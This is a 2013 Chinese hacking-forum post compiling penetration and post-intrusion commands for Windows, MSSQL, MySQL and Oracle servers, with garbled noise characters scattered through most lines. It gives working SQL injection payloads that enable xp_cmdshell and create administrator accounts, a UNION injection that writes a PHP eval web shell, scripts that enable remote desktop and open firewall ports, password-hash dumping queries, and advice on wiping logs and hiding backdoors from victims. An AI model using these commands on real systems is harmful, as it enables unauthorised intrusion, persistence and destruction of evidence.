找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 5346|回复: 0
打印 上一主题 下一主题

渗透技术大全

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:24:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/ c6 y  S6 w# q8 h# D, M6 \
1.net user administrator /passwordreq:no/ c0 T  M3 ^  P7 r2 e/ H, v
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
! c8 B  z- J1 b$ P2.比较巧妙的建克隆号的步骤4 X/ F5 P3 G9 v2 `5 G
先建一个user的用户0 j2 D1 B+ d  ~7 B- z
然后导出注册表。然后在计算机管理里删掉$ N: i2 f5 F( z" I8 o, r+ `3 a6 w
在导入,在添加为管理员组
! {& Y* P* c+ `3 D& F3.查radmin密码$ t8 c: {8 h  u& B9 K
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
8 A5 J  J  [0 }) e4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
8 E5 F' B, z! d9 ]建立一个"services.exe"的项4 \! v# B* R7 O
再在其下面建立(字符串值)
' h( r$ o6 \8 v1 `& p2 Y' j% t  u; x键值为mu ma的全路径, ]- C7 ?* C" w+ h3 ?3 j) H
5.runas /user:guest cmd2 G; i2 N! K3 F' \# s+ K3 V3 C0 o8 \
测试用户权限!
' u1 P# L# G3 y8 m& c& `4 O6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?$ J* k8 M% F8 x$ j8 t, @
7.入侵后漏洞修补、痕迹清理,后门置放:
) n, D: q) @" |6 X" c" B3 l基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门+ g8 T$ O0 _+ y5 I7 e3 N
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c7 }8 x3 H( u$ ?  T% P) |/ ~

+ k- E( }2 ^: ?' K! J' v' {for example& B1 G) L% s, ?5 W6 ]

8 T& H4 F; X2 x' n8 q# D- Y- L0 vdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add': ?2 e* b! K; f4 Y- B, ^5 M" `

+ r( H0 ?' }6 p2 D5 i3 V- _% ldeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'* }8 t7 ~0 c& m/ u3 T9 G2 v
4 l6 Z8 {3 R# l/ z9 j2 Q
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
' \8 l. V- ], I/ a如果要启用的话就必须把他加到高级用户模式
9 n/ l+ `( G3 z可以直接在注入点那里直接注入
  w8 Q, t  M* o! h+ K6 eid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
4 x2 g, _6 ~" ^3 M& `+ |- N% i. E( [然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
& S+ j  {  C. c1 x+ Q* b7 ~% H或者4 C( [$ }( f; G) W' H
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
5 V+ u- Y, p" x. s, }1 d$ n来恢复cmdshell。
1 I; r) q, t  U
# M; [% P6 i3 h1 \分析器
' P7 z6 X% k; Z/ ]* E% REXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
; R2 w8 i1 M# E1 p4 I% z然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
: f: o/ s/ m& i7 I/ g" U10.xp_cmdshell新的恢复办法: B% K8 u8 K, X* r  V5 m
xp_cmdshell新的恢复办法. B1 h  Z2 T" z) Z9 A. }
扩展储存过程被删除以后可以有很简单的办法恢复:
* I9 H; ?7 U+ a7 r: C删除5 N6 c, n% v% a/ Z5 t% s8 M
drop procedure sp_addextendedproc, f, P: t" D% p
drop procedure sp_oacreate
' ^7 m' @4 u( T. n2 Dexec sp_dropextendedproc 'xp_cmdshell'
! K# Y/ n  {/ C) {# [6 @, t7 D$ M5 ^$ g3 r1 I( `
恢复
6 V$ n5 A  \( y: K- `dbcc addextendedproc ("sp_oacreate","odsole70.dll")
  q, H+ k: R9 Q. adbcc addextendedproc ("xp_cmdshell","xplog70.dll")
& v0 \- t' Z/ @
& p+ o( k! |' z这样可以直接恢复,不用去管sp_addextendedproc是不是存在
1 L/ H2 u& K- e. x" [  j
; e' |- a4 h% }! W-----------------------------8 A' \& i+ p' @, \8 B
1 T, }8 g2 J4 X6 ?# v9 J/ y/ D
删除扩展存储过过程xp_cmdshell的语句:
5 Q$ @( V6 s* r8 P: o7 bexec sp_dropextendedproc 'xp_cmdshell'
" H, A5 u& o8 [# A
9 A5 H6 z2 ?+ F5 t恢复cmdshell的sql语句# _1 b! n: z) r; R0 [3 [
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'3 y9 ?& J1 R* V9 g3 c, u. ?
) l8 h# x' K# a+ p

8 W+ L5 q- f6 g" I开启cmdshell的sql语句
2 B* X. s' m% c9 [6 @; g! z' g: |* ]/ ~% w/ r% \
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'6 e$ x; O, ~8 ~0 v& p' m
8 u9 \8 s& M8 C9 m/ i$ ]
判断存储扩展是否存在
- R, X$ \/ v, ~- K! r9 {' Lselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
8 |2 u5 `8 L+ k; Q. }+ }2 e5 {" R, }返回结果为1就ok
( k: n  H8 y! L% Y1 }5 R9 g% M+ H8 V: x8 p' F3 {
恢复xp_cmdshell, o+ u1 g" F; \$ o
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'- L" @, H& Y: }) X$ p
返回结果为1就ok/ u; k% q' R8 X$ c( [3 q0 d
; R# w% X! X+ {* Z
否则上传xplog7.0.dll
4 K3 X4 ?4 ]7 Y- j; Zexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
3 ~" I- U# {4 U* c
& A1 n) {7 t" ]9 S' `+ x堵上cmdshell的sql语句! i4 g. m- k4 O+ H# }
sp_dropextendedproc "xp_cmdshel
: f: f# G' M% l6 b/ D4 ^-------------------------
: }1 n& m7 m( m- S7 E* G- f+ G清除3389的登录记录用一条系统自带的命令:
  j* T4 c0 N, M" ]reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f
$ ^* B2 E  B; ~0 J2 J* X( s# e& l( O) s) h5 m$ G* Z
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
1 I# X8 R, a( T$ j1 ?9 Q. G7 \: `在 mysql里查看当前用户的权限9 A3 w# Z# z  o* n9 Z; L
show grants for  0 K; J% q, j; l- t6 [( f

& \+ N, Q1 U2 ]/ n5 E6 B以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。0 V: B6 p! m- r
& G! k: A( g: Z+ d. p$ j1 L* l8 h! t
) z/ w/ X; s/ c
Create USER 'itpro'@'%' IDENTIFIED BY '123';/ P( w1 `# U# ?/ C

; h5 ~" |* B5 L7 s- r8 cGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION8 b- T- {; \* T( g5 q
  F3 C5 m5 X3 [6 G
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
* k2 x$ s/ x9 X( I+ ]: ~) }
" r0 k* T  I6 K! C' V3 S/ d, a5 t+ p3 _MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;5 ]" W2 N/ j0 T
3 C8 p* l# I7 n( E3 M
搞完事记得删除脚印哟。
! g2 z$ }5 m) V- c% f8 @: D; X) d0 ^7 I
Drop USER 'itpro'@'%';
/ m; c' I+ S' r6 y- f7 }
' ]* w' H/ Y( O# F6 S" l3 tDrop DATABASE IF EXISTS `itpro` ;
$ ?# O; x+ `" R2 t" s! L3 ~
# `. h* }& z7 E当前用户获取system权限5 E- v9 j# s0 z9 t. [
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
# Y4 F  r" m& F* G' |' U) F) hsc start SuperCMD+ j6 H. f8 `* ~4 q1 F
程序代码5 {% [/ T1 D+ N# [% x/ C$ b
<SCRIPT LANGUAGE="VBScript">/ y( t, X; H9 L( g( k- {
set wsnetwork=CreateObject("WSCRIPT.NETWORK")/ _  q1 u0 ^6 H/ f7 }: `5 _% C
os="WinNT://"&wsnetwork.ComputerName
' Y3 Q, {; G% D/ eSet ob=GetObject(os)! _4 n5 D$ j  W/ I- @6 B# ~
Set oe=GetObject(os&"/Administrators,group")
- Q1 N9 S& r: l5 ]; f2 K$ OSet od=ob.Create("user","nosec")( _/ L7 r: B6 O& T! S) u. H2 v
od.SetPassword "123456abc!@#"
7 n" H# v: T  Z  G$ Hod.SetInfo8 \% j/ B& H5 S) s7 ^& g
Set of=GetObject(os&"/nosec",user)
. F6 V& C& R* e, _) E- s3 h0 q4 Moe.add os&"/nosec"5 g' [% j2 y& y! s
</Script>
5 F( q3 N$ H+ i. O4 Z, S<script language=javascript>window.close();</script>& W" Z# h3 Q& D3 V/ `" G2 P; f

) I& |' H2 K/ K; _# Z1 z; E
2 X0 ]. x4 L! A/ P; I
# D5 I  q% _. Y# [: d! V0 Y5 C4 R" N0 y5 h. H( s
突破验证码限制入后台拿shell
( [& Z7 h( R& n4 \5 |程序代码
5 k1 W8 K6 g$ \1 Z8 \- Z4 M( BREGEDIT4
' r7 ~) p: K' l7 D7 F; Q. U. j  \[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
$ ^- k8 V2 _8 O; [& b; J/ K"BlockXBM"=dword:000000008 T, n5 z$ T9 d2 q. y
1 A* M$ C7 n& M$ t
保存为code.reg,导入注册表,重器IE( Z$ [1 w% d( h4 M: o: X
就可以了/ L' E& \$ i  M, S
union写马5 s1 s' i' m6 q. C, A
程序代码1 r5 d- L0 T+ O  t4 F
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*/ \  N$ v% q7 J3 \# m( V7 t
3 F7 s$ h7 \/ I( O- {$ p
应用在dedecms注射漏洞上,无后台写马
6 ?4 b4 K$ ^+ l- V% [dedecms后台,无文件管理器,没有outfile权限的时候
. W6 }, V% [5 A7 }# I! q' V在插件管理-病毒扫描里
5 ^! N* K- b% G' G8 \- ^0 p7 o写一句话进include/config_hand.php里
0 u. o: [% |# K( g2 U6 k程序代码
, W$ ~- U) x0 ^9 i' P& |2 [>';?><?php @eval($_POST[cmd]);?>
8 k+ I* e# C( ^. h" I; I1 y! e$ P' A9 X" @( W( q

& a) n* P7 |9 u如上格式
, {! _+ U* i6 ^( _  l% X" \; c6 R( @- E* l0 k
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解. l% H, [6 I9 H& u
程序代码
6 Z1 [4 v. D( W. ^4 p' D8 N4 A0 |+ |select username,password from dba_users;4 B' Z3 p  M% Z; v

, S+ h/ k' n/ s0 j5 d( `8 p, e
mysql远程连接用户5 N2 d* i5 _7 B! A; i+ s
程序代码
7 o* u2 e" x' b: a9 g7 J5 S  J7 @# }6 D: C
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';, j4 O- f; L2 e1 V& I; D* h
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
) b. g/ t- c* u. H3 T- B( s/ Y& CMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0* ^) p; g( ^6 I5 [, X
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
. o0 j$ k; E" `
: e2 j% \& T. p1 x. J3 x& O% W
, p. ?. n$ i$ _1 Q8 d; M) o
! I) f( H  |6 c+ |$ l8 \. E
( T! l8 D% [6 K! [, mecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0$ |- e1 c) K" z' a+ B! u
3 V4 f0 z5 R. P' z# I! J+ W
1.查询终端端口  t8 Z9 H! `' t5 u
( Z& Y+ p1 f$ e
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
' C* d: E7 p$ p1 l: k% I. d' s6 \. E- A; j8 E- d; v" A- T
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"7 Q" A* t% @- h. u) \
type tsp.reg7 K: k' c7 D: x, @0 p" T1 n  Q

% f) S; w1 T& F( x2.开启XP&2003终端服务
0 z) _1 _" z- E2 ?- N: U$ ^
; ]6 m5 [" O, v3 L& m) Y
3 g1 W' m/ e/ d. W4 oREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
5 w  d$ B" y; C$ d  ], a# ?4 u  c4 D% ?/ {% B: Z
8 n4 K. M; ~6 O9 u* W
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f* E" I" Q4 o7 [
  n  G% m# |  {- l# [
3.更改终端端口为20008(0x4E28)
, Z8 T; ~6 ~5 o' I4 S( r9 d
4 q  d9 S. U; T* _! z/ Q/ _REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
$ w. i, a% \7 S6 w
6 _- S  T5 z, D0 P5 Y" M  GREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
2 M* N/ i1 t6 W6 _
- ?6 Q" h- q8 B3 }4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
0 w  V. C! p0 @: @$ m! y% z: y
) \+ r; j" o8 P- R) n  K- S) Y6 QREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
. o& V' _- x3 W; R
% ~8 P( W! G$ w/ O% C: `* C& |- `4 ]9 K
4 I2 d' @7 u5 j5 t; H5.开启Win2000的终端,端口为3389(需重启)2 w9 ^3 U/ [9 {$ a$ l

) I  z1 W& Y3 G7 @$ techo Windows Registry Editor Version 5.00 >2000.reg
. `6 {! y! p. m. e4 ?( {1 _5 zecho. >>2000.reg3 y1 U' u5 o1 g9 }8 o
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
1 ^0 x& }) |3 {5 s9 ~1 Vecho "Enabled"="0" >>2000.reg
0 K4 S8 k# N, A+ G, {5 b4 x- Iecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg 8 j0 P+ U, q/ w# m/ M5 f- H( h6 \  z
echo "ShutdownWithoutLogon"="0" >>2000.reg 9 Y7 j/ J5 P. j
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg ( I5 ]: u: C, t
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg $ a) h, L$ s2 p
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg   R8 c: v) w  i6 C& v
echo "TSEnabled"=dword:00000001 >>2000.reg 2 @) B4 t& k. y; ?; Y0 Q( v
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
; {7 m) ]$ g( H9 _* k2 S% ]7 qecho "Start"=dword:00000002 >>2000.reg
  m! N& D& P- secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
  V" F0 c1 Q: Aecho "Start"=dword:00000002 >>2000.reg
, u' n8 J2 n/ d6 F/ aecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 3 ~- p( u# ^- t: q3 P' N* O( z% E) ?
echo "Hotkey"="1" >>2000.reg
1 p; K! {& D" B) Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg 4 [' s+ d' x7 a8 S4 E: o
echo "ortNumber"=dword:00000D3D >>2000.reg 1 P; C, M+ I7 i0 T4 v, M$ K# s
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
5 V/ |  E. {/ U# W* ]5 Oecho "ortNumber"=dword:00000D3D >>2000.reg
3 W. w6 B$ i4 Y+ P" k. l  ~
2 ~1 o$ U1 s1 s. t6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
6 }& u6 l1 t$ I) D( R
" h) _) ?; n8 r$ `1 s  ?@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
  r; N6 K- y: C& f; ^(set inf=InstallHinfSection DefaultInstall)6 M! j+ z+ U8 n
echo signature=$chicago$ >> restart.inf
& i2 u1 ^. d8 n7 B( T! f! r) decho [defaultinstall] >> restart.inf
6 {$ J/ }' _5 w5 }  D2 g/ g$ ^9 frundll32 setupapi,%inf% 1 %temp%\restart.inf7 T. R1 Y) h, r2 W
; O6 T7 r7 D7 S/ ?

* t) f7 M6 U9 P. e% C% m7.禁用TCP/IP端口筛选 (需重启)  g! a* c% h- B. d* k% U/ g

7 n2 l  ]+ G1 [( G/ KREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f' W0 k  w! F) w1 l
( m4 [4 |" G8 [8 I
8.终端超出最大连接数时可用下面的命令来连接" R" U+ E( ?$ ^& [6 _8 \
/ a6 u( f9 q- [: v% q* u
mstsc /v:ip:3389 /console; m# U) e1 V2 q; ~

4 ?5 S% s/ a3 \; _) O9.调整NTFS分区权限
7 P, @) p( ?( R; t( ?
6 t4 c/ }: N) g1 Icacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)3 R1 T0 a" |0 K- R3 e" |" ~
# A5 |- a8 `. P
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)! g7 ~' ^( \& f- h, T3 h
7 ]  }& [8 j# Y9 y4 c% S3 r/ M
------------------------------------------------------& B$ J; N1 p0 {
3389.vbs
; A* m( Q2 }4 N1 F' EOn Error Resume Next
  t2 ?$ m  a5 K. P* M1 Mconst HKEY_LOCAL_MACHINE = &H80000002
) m! E" B6 Y& g0 K6 G) {$ }strComputer = "."
2 P5 J. y1 u1 n6 KSet StdOut = WScript.StdOut0 K1 _5 w) q( }2 O
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
; t/ ?. V, v9 H' GstrComputer & "\root\default:StdRegProv")! Q7 i& _* V- Y! z6 F
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"! R3 E0 u  Y/ i' ~; w" ~. `
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
" k* V' F# U- T4 Z; g. C/ hstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"2 h3 z" [4 H( `/ C# l" O' p5 Q
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath/ I8 j% d4 v; ^% n! F% P
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
; B* P$ L# W: S  _& IstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
9 P1 L! e) c2 f+ ~strValueName = "fDenyTSConnections"6 m7 _* D: W' ^' S" j
dwValue = 0
3 t" @3 X* a; T% p6 D% C& n# aoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue" L/ x' k4 a& X, K' g/ o8 D6 D
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"! Z, m9 V- u. F0 i# \$ M1 M) h! Q& C
strValueName = "ortNumber"8 Z% H/ ~+ L! }0 N% P$ `- p
dwValue = 3389
* V9 o( y% ~# c" `oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue9 H( d1 n( s1 q4 H
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
4 k+ u/ p$ w) pstrValueName = "ortNumber"$ Q- ]% I$ A! C7 _
dwValue = 3389
" L- d8 ^* s, {3 ?2 M! foreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue% [$ F* N1 Z9 k" a7 h" n( ]
Set R = CreateObject("WScript.Shell") , [6 R8 A& {  E' @8 L
R.run("Shutdown.exe -f -r -t 0") ( m: O' D& _$ j* Y; h# m

* H. j6 R1 y) M删除awgina.dll的注册表键值
0 U4 M: e# k3 g" I) x( x8 E2 Z程序代码
7 b' ~. l' t3 w7 |7 a. B$ o# m& i9 M' F# c) I( [$ t, r
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f9 M6 N# `* Z6 v5 [  s, t
3 R+ {0 |/ i( _9 k- F+ `& J2 p

! p' _2 `1 L0 i4 G7 M; [, X8 S( i7 k% d% G

4 ], [# q: x& P5 W* A8 P) o( U* f程序代码
0 g+ N* P! }9 n4 A  ?: PHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash+ ]5 A0 D$ p% k# x. X4 M
0 P, b2 `: D9 w6 s4 R8 n3 t
设置为1,关闭LM Hash  B- S! X5 W  W" w9 s
. r$ @/ ^* }3 P4 z+ o6 `
数据库安全:入侵Oracle数据库常用操作命令
$ h) D& w" x$ ^0 E最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
* @8 u8 x# W) U+ x, ~1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
- |' f  l7 V. x2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
: ~- I+ ^4 m2 U; ~4 P( Y6 v/ S3、SQL>connect / as sysdba ;(as sysoper)或. b7 h, ~4 \; J! W) @+ k  q
connect internal/oracle AS SYSDBA ;(scott/tiger)
" g$ r& w# ?+ J( g9 L. M. Vconn sys/change_on_install as sysdba;
+ }# d3 S% `. o7 B: d. P7 v1 T4、SQL>startup; 启动数据库实例9 r8 H5 K0 i" y0 ~7 x
5、查看当前的所有数据库: select * from v$database;
7 D0 b7 X, W+ T) k' @select name from v$database;; N6 }8 C1 j7 G( T% Z
6、desc v$databases; 查看数据库结构字段
3 S; ^  G3 G4 F6 q! L7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
+ k) A* Q7 w9 N0 ISQL>select * from V_$PWFILE_USERS;
: m# I, ]- x6 }$ e. K* X, J7 v* }Show user;查看当前数据库连接用户
4 d. T% e; p9 r; @" Q, t8、进入test数据库:database test;
5 u0 C+ x  Q6 b8 \, T& l9 y9、查看所有的数据库实例:select * from v$instance;8 x; _; ^! {0 ^6 K
如:ora9i: T) d% `1 i$ M9 X+ U
10、查看当前库的所有数据表:& Y3 |+ ?7 `! d9 g: z
SQL> select TABLE_NAME from all_tables;8 [0 g) \) y1 p) i, D3 r
select * from all_tables;/ M3 _& t0 a' V0 i: F& P0 f
SQL> select table_name from all_tables where table_name like '%u%';# Y9 P8 Z( N  B1 ^0 O
TABLE_NAME
$ U5 Q5 a  ?  Z2 m/ h. V------------------------------
9 ]5 S5 b% ]" ?/ D$ [- x_default_auditing_options_' R7 O) e/ }3 Z$ A! v' H
11、查看表结构:desc all_tables;1 E; d; F  m/ C5 E. N; f
12、显示CQI.T_BBS_XUSER的所有字段结构:
' Q9 w8 d: k" r. ]desc CQI.T_BBS_XUSER;0 I1 x& r# K3 w% C4 n
13、获得CQI.T_BBS_XUSER表中的记录:5 V. A! _  \% J" @- [2 T: i
select * from CQI.T_BBS_XUSER;% X# a/ G9 D! R. B- s5 d9 s$ T. D
14、增加数据库用户:(test11/test)
  ?4 E/ T9 c1 S" \! O: pcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
+ P3 s' k1 I# t3 N15、用户授权:
/ V5 T) K' I* i8 U: T1 hgrant connect,resource,dba to test11;/ m# p$ Z" p2 `9 O8 o. f& e/ N
grant sysdba to test11;
4 |( p( l* [! Z: P$ H; Icommit;0 N( c6 o$ y* o- p) G
16、更改数据库用户的密码:(将sys与system的密码改为test.)0 J6 @; j& u0 G9 c# T: h
alter user sys indentified by test;
' L# b6 r+ n# A  Lalter user system indentified by test;
1 T8 {% G2 J# }( ^) A2 g& f9 Y5 K; @: x0 f
applicationContext-util.xml
& ]/ @) y, t$ B6 R% B3 W1 gapplicationContext.xml) f) V' o. u# }' E) S5 m
struts-config.xml5 T1 g) [$ f1 n
web.xml
) X; ~& m$ J0 g+ `server.xml
' V" \; h3 `# [# K) w/ Btomcat-users.xml
) a- ~# z1 m+ Z  e2 O- [hibernate.cfg.xml& y0 s- _3 I& Z+ T+ K
database_pool_config.xml
# x& Q8 s, Y% A5 i0 e5 B
! J( L0 Y9 n4 M% |8 k4 w* v
9 ?% Q- \' s) \& N" N- Z\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
$ O# N( P" W; B7 U7 s5 j\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini, P! y1 U; w# T5 ]9 @; l& b* [
\WEB-INF\struts-config.xml  文件目录结构
) L! \( V/ g- }$ A  ^# J3 N' C' a/ Q; Y
spring.properties 里边包含hibernate.cfg.xml的名称
1 O* F7 n$ k& A2 p; h& s! R
: `: ~/ P$ Q9 C6 C
$ s8 @0 O. d' y/ LC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml/ L. Z% Z# }9 R

/ [0 l2 R. Z! S7 P如果都找不到  那就看看class文件吧。。$ U% I! t4 Q: I2 @2 g/ g

' P2 Y( K& f: E( ]测试1:
* q3 @1 P" d$ h0 C+ Z. R5 G! }SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1; D" p8 I0 g3 f5 z+ {, ?( V
7 g. P7 C- i3 z# c
测试2:
$ L& _7 o0 }5 t9 q1 ?2 A- r
* ^7 z! h! a: w" V- hcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
, ]% s: x( ?1 T# @5 |0 B
3 z4 `6 R- }. r; X) Ydelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--( }* s- n  n: q: P

9 T, _$ w! a5 W% [SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t11 C5 L- a0 ?0 z1 g' e1 K% W2 |, z

4 e8 j6 W) Q3 W2 ~7 N查看虚拟机中的共享文件:1 H; g" a- o* c& D: u6 ]
在虚拟机中的cmd中执行: X6 u7 X$ p8 u
\\.host\Shared Folders
2 }3 Z( _' D8 ?( {5 J& h. `$ j7 F' y# A6 j* R, ~
cmdshell下找终端的技巧/ A; a5 E4 w4 \% D
找终端: ! t" ~* A! Z9 d9 s* o( }+ M
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
* e4 k: W* P2 _8 H) ^   而终端所对应的服务名为:TermService ' [+ g4 k9 R$ v& V  H# y- b; t
第二步:用netstat -ano命令,列出所有端口对应的PID值! 5 K( F) I5 i, Z0 a- i* A+ j
   找到PID值所对应的端口: x6 m0 D9 I' o6 I) B! W

' C; Y' T: n& w* W2 v1 f查询sql server 2005中的密码hash
& v2 I4 n* c8 {6 ^1 P) FSELECT password_hash FROM sys.sql_logins where name='sa'  i/ h% U- i$ i
